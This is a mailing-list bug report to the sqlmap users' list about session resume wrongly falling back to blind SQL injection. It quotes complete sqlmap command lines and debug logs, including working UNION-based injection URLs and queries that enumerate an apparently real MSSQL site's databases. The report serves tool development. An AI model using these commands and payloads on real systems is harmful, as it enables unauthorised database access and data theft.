Re: [sqlmap-users] Bug(?) with resuming/not resuming sessions with MSSQL (possible anothers dbms)
Brought to you by:
inquisb
From: David G. <sk...@gm...> - 2010-03-19 02:52:58
|
The problem happens because when sqlmap perform the resume of the UNIONSQLi session, sqlmap does not check if he already have the amount of dbs, tables or columns before attempting to retrieve through UNIONSQLi their names. On Thu, Mar 18, 2010 at 11:23 PM, David Guimaraes <sk...@gm...> wrote: > # svn info > Path: . > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 1497 > Node Kind: directory > Schedule: normal > Last Changed Author: inquisb > Last Changed Rev: 1497 > Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010) > > > On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote: >> When I try to run the sqlmap this way: >> >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" >> -p art --string WRAPED >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 22:53:24 >> >> [22:53:24] [DEBUG] initializing the configuration >> [22:53:24] [DEBUG] initializing the knowledge base >> [22:53:24] [DEBUG] cleaning up configuration parameters >> [22:53:24] [DEBUG] setting the HTTP timeout >> [22:53:24] [DEBUG] setting the HTTP method to GET >> [22:53:24] [DEBUG] creating HTTP requests opener object >> [22:53:24] [DEBUG] parsing XML queries file >> [22:53:24] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [22:53:24] [INFO] testing connection to the target url >> [22:53:25] [INFO] testing if the provided string is within the target >> URL page content >> [22:53:29] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 >> parenthesis >> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' >> [22:53:29] [DEBUG] got HTTP error code: 500 >> [22:53:30] [DEBUG] got HTTP error code: 500 >> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' >> [22:53:30] [DEBUG] got HTTP error code: 500 >> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable >> with 0 parenthesis >> [22:53:30] [INFO] testing for parenthesis on injectable parameter >> [22:53:31] [DEBUG] got HTTP error code: 500 >> [22:53:31] [DEBUG] got HTTP error code: 500 >> [22:53:32] [DEBUG] got HTTP error code: 500 >> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis >> [22:53:32] [INFO] testing MySQL >> [22:53:32] [DEBUG] got HTTP error code: 500 >> [22:53:32] [WARNING] the back-end DMBS is not MySQL >> [22:53:32] [INFO] testing Oracle >> [22:53:33] [DEBUG] got HTTP error code: 500 >> [22:53:33] [WARNING] the back-end DMBS is not Oracle >> [22:53:33] [INFO] testing PostgreSQL >> [22:53:33] [DEBUG] got HTTP error code: 500 >> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL >> [22:53:33] [INFO] testing Microsoft SQL Server >> [22:53:34] [DEBUG] got HTTP error code: 500 >> [22:53:34] [INFO] confirming Microsoft SQL Server >> [22:53:35] [DEBUG] got HTTP error code: 500 >> [22:53:35] [DEBUG] got HTTP error code: 500 >> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with >> NULL bruteforcing technique >> [22:53:39] [DEBUG] got HTTP error code: 500 >> [22:53:39] [DEBUG] got HTTP error code: 500 >> [22:53:40] [DEBUG] got HTTP error code: 500 >> [22:53:40] [DEBUG] got HTTP error code: 500 >> [22:53:44] [DEBUG] got HTTP error code: 500 >> [22:53:44] [DEBUG] got HTTP error code: 500 >> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' >> [22:53:45] [DEBUG] got HTTP error code: 500 >> [22:53:45] [DEBUG] got HTTP error code: 500 >> [22:53:46] [DEBUG] got HTTP error code: 500 >> [22:53:46] [DEBUG] got HTTP error code: 500 >> [22:53:47] [DEBUG] got HTTP error code: 500 >> [22:53:47] [DEBUG] got HTTP error code: 500 >> [22:53:47] [WARNING] the target url is not affected by an exploitable >> full inband sql injection vulnerability >> [22:53:47] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'art' by appending a false condition after the >> parameter value >> [22:53:48] [DEBUG] got HTTP error code: 500 >> [22:53:49] [DEBUG] got HTTP error code: 500 >> [22:53:49] [DEBUG] got HTTP error code: 500 >> [22:53:49] [INFO] the target url is affected by an exploitable partial >> (single entry) inband sql injection vulnerability >> valid union: >> 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' >> >> [22:53:49] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 22:53:49 >> >> >> >> >> >> >> >> >> >> >> He notes correctly UNIONSQLi and ends OK. Soon after that, I try to >> recover the database by including only the argument "--dbs" and he can >> not recover in advance with the UNIONSQLi strange reason described >> below and to the BLINDSQLi. He tries to find the right table name >> without first knowing how many there really are through the use of the >> UNIONSQLi and direct try to find out how many there are and their >> names using the BLINDSQLi. >> >> Example with resume: >> >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" >> -p art --string WRAPED --dbs >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 22:54:40 >> >> [22:54:40] [DEBUG] initializing the configuration >> [22:54:40] [DEBUG] initializing the knowledge base >> [22:54:40] [DEBUG] cleaning up configuration parameters >> [22:54:40] [DEBUG] setting the HTTP timeout >> [22:54:40] [DEBUG] setting the HTTP method to GET >> [22:54:40] [DEBUG] creating HTTP requests opener object >> [22:54:40] [DEBUG] parsing XML queries file >> [22:54:40] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [22:54:40] [INFO] resuming string match 'WRAPED' from session file >> [22:54:40] [INFO] resuming injection point 'GET' from session file >> [22:54:40] [INFO] resuming injection parameter 'art' from session file >> [22:54:40] [INFO] resuming injection type 'numeric' from session file >> [22:54:40] [INFO] resuming 0 number of parenthesis from session file >> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' >> from session file >> [22:54:40] [INFO] resuming union comment '--' from session file >> [22:54:40] [INFO] resuming union count 6 from session file >> [22:54:40] [INFO] resuming union position 2 from session file >> [22:54:40] [INFO] testing connection to the target url >> [22:54:43] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [22:54:43] [INFO] testing for parenthesis on injectable parameter >> [22:54:43] [DEBUG] skipping test for MySQL >> [22:54:43] [DEBUG] skipping test for Oracle >> [22:54:43] [DEBUG] skipping test for PostgreSQL >> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [22:54:43] [INFO] fetching database names >> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), >> NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 >> [22:54:44] [DEBUG] got HTTP error code: 500 >> [22:54:45] [WARNING] for some reasons it was not possible to retrieve >> the query output through inband SQL injection technique, sqlmap is >> going blind >> [22:54:45] [INFO] fetching number of databases >> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) >> AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases >> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 >> [22:54:48] [DEBUG] got HTTP error code: 500 >> . >> . >> . >> [23:12:13] [DEBUG] performed 42 queries in 16 seconds >> available databases [3]: >> [*] mXX >> [*] pXX >> [*] tXX >> >> [23:12:13] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 23:12:13 >> >> >> >> >> >> >> >> >> >> >> >> But if I delete the session and send the sqlmap start over with the >> "--dbs" activated, it correctly retrieves how many databases and their >> names using the correct technique (UNIONSQLi). >> >> Example without resume (using --dbs first time): >> # rm -rf output/* >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" >> -p art --string WRAPED --dbs >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 23:16:02 >> >> [23:16:02] [DEBUG] initializing the configuration >> [23:16:02] [DEBUG] initializing the knowledge base >> [23:16:02] [DEBUG] cleaning up configuration parameters >> [23:16:02] [DEBUG] setting the HTTP timeout >> [23:16:02] [DEBUG] setting the HTTP method to GET >> [23:16:02] [DEBUG] creating HTTP requests opener object >> [23:16:02] [DEBUG] parsing XML queries file >> [23:16:02] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [23:16:02] [INFO] testing connection to the target url >> [23:16:02] [INFO] testing if the provided string is within the target >> URL page content >> [23:16:03] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 >> parenthesis >> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' >> [23:16:04] [DEBUG] got HTTP error code: 500 >> [23:16:04] [DEBUG] got HTTP error code: 500 >> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable >> with 0 parenthesis >> [23:16:05] [INFO] testing for parenthesis on injectable parameter >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:06] [DEBUG] got HTTP error code: 500 >> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis >> [23:16:06] [INFO] testing MySQL >> [23:16:06] [DEBUG] got HTTP error code: 500 >> [23:16:06] [WARNING] the back-end DMBS is not MySQL >> [23:16:06] [INFO] testing Oracle >> [23:16:07] [DEBUG] got HTTP error code: 500 >> [23:16:07] [WARNING] the back-end DMBS is not Oracle >> [23:16:07] [INFO] testing PostgreSQL >> [23:16:07] [DEBUG] got HTTP error code: 500 >> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL >> [23:16:07] [INFO] testing Microsoft SQL Server >> [23:16:08] [DEBUG] got HTTP error code: 500 >> [23:16:08] [INFO] confirming Microsoft SQL Server >> [23:16:14] [DEBUG] got HTTP error code: 500 >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with >> NULL bruteforcing technique >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:17] [DEBUG] got HTTP error code: 500 >> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' >> [23:16:17] [DEBUG] got HTTP error code: 500 >> [23:16:18] [DEBUG] got HTTP error code: 500 >> [23:16:18] [DEBUG] got HTTP error code: 500 >> [23:16:19] [DEBUG] got HTTP error code: 500 >> [23:16:19] [DEBUG] got HTTP error code: 500 >> [23:16:20] [DEBUG] got HTTP error code: 500 >> [23:16:20] [WARNING] the target url is not affected by an exploitable >> full inband sql injection vulnerability >> [23:16:20] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'art' by appending a false condition after the >> parameter value >> [23:16:21] [DEBUG] got HTTP error code: 500 >> [23:16:22] [DEBUG] got HTTP error code: 500 >> [23:16:27] [DEBUG] got HTTP error code: 500 >> [23:16:27] [INFO] the target url is affected by an exploitable partial >> (single entry) inband sql injection vulnerability >> valid union: >> 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' >> >> [23:16:27] [INFO] fetching database names >> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 >> [23:16:28] [DEBUG] got HTTP error code: 500 >> [23:16:28] [DEBUG] performed 1 queries in 0 seconds >> [23:16:28] [INFO] the SQL query provided returns 3 entries >> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 >> [23:16:31] [DEBUG] got HTTP error code: 500 >> [23:16:31] [DEBUG] performed 2 queries in 3 seconds >> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 >> [23:16:32] [DEBUG] got HTTP error code: 500 >> [23:16:32] [DEBUG] performed 3 queries in 0 seconds >> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 2 name FROM master..sysdatabases)-- AND 231=231 >> [23:16:33] [DEBUG] got HTTP error code: 500 >> [23:16:33] [DEBUG] performed 4 queries in 1 seconds >> available databases [3]: >> [*] mXX >> [*] pXX >> [*] tXX >> >> [23:16:33] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 23:16:33 >> >> >> >> >> >> >> >> >> >> >> >> The same thing happens if I send sqlmap to dump the tables (--tables). >> If I do not pass --tables the first time it runs and discovers the >> vulnerability, when it runs again with the resumed file, it just go >> right for BLINDSQLi, taking much longer to complete the task! >> >> >> >> -- >> David Gomes Guimarães >> > > > > -- > David Gomes Guimarães > -- David Gomes Guimarães |